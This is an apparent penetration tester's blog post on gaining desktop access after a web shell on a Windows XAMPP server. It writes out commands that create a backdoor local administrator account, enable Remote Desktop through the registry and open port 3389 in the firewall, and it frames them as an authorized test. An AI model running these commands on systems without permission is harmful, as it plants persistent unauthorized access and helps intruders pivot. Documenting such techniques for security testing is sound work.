Been extremely busy with loads of work. Anyways, here’s something interesting that I needed to do recently at a customer network to gain access to a server.
I managed to obtain a web application shell to the server and was able to execute commands as Administrator. The Application was running of XAMPP under an administrative accounts, so I was lucky there. But what I needed was GUI access to the desktop because I wanted to compromise another server which was reachable using a custom programmed application running on the server that I had just gained access to. Here’s what I did:
1. Created a user and added it to the local administrators group using these commands:
net user newadmin newpa$$w0rd /add
net localgroup administrators newadmin /add
net user newadmin
2. Used the following commands to enable Remote Desktop and logged in with my credentials:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
/v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set portopening TCP 3389
3. Bit off a large chunk of some awesome tasting chicken sandwich, sipped some coffee and then proceeded with the rest of the Penetration Test.
Lot of Penetration Testers, reach this wall at some point during their assessments. Hope this helps some tired soul like me.